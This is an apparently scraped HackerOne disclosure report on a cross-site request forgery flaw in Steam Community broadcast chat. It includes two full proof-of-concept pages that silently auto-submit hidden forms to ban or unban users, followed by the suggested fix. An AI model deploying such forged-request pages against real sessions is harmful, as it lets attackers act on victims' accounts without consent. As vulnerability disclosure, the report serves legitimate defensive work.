Unban in chat - CSRF

severity_rating: low created_at: 2018-07-13 12:28:25 vendor: valve https://hackerone.com/valve bounty_amount: $500

Steps to reproduce

<iframe style="display:none" name="csrf-frame"></iframe>
<form action="https://steamcommunity.com/broadcast/ajaxupdateusermute/" method="POST" target="csrf-frame" id="csrf-form">
<input type="hidden" name="broadcaststeamid" value="{STEAM ID}">
<input type="hidden" name="issuersteamid" value="{STEAM ID}">
<input type="hidden" name="chattersteamid" value="{USER'S STEAM ID TO UNBAN}">
<input type="hidden" name="bantype" value="0">
<input type="hidden" name="duration" value="0">
<input type="hidden" name="perm" value="0">
</form>
<script>document.getElementById("csrf-form").submit()</script>
<html>
<head>
    <title>Unban in chat - CSRF</title>
</head>

<body>
<h1>Somebody was unbanned silently :/</h1>
</body>
</html>

<iframe style="display:none" name="csrf-frame"></iframe>
<form action="https://steamcommunity.com/broadcast/ajaxupdateusermute/" method="POST" target="csrf-frame" id="csrf-form">
<input type="hidden" name="broadcaststeamid" value="{STEAM ID}">
<input type="hidden" name="issuersteamid" value="{STEAM ID}">
<input type="hidden" name="chattersteamid" value="{USER'S STEAM ID TO BAN}">
<input type="hidden" name="bantype" value="1">
<input type="hidden" name="duration" value="0">
<input type="hidden" name="perm" value="1">
</form>
<script>document.getElementById("csrf-form").submit()</script>
<html>
<head>
    <title>Ban in chat - CSRF</title>
</head>

<body>
<h1>Somebody was banned silently :/</h1>
</body>
</html>

Video PoC

*I banned myself, because i don't have third Steam account

Fix

Add sessionid parameter to POST request, like this implemented in others requests.

Impact

Attacker can permanently ban or unban other users.

源链接

Hacking more

...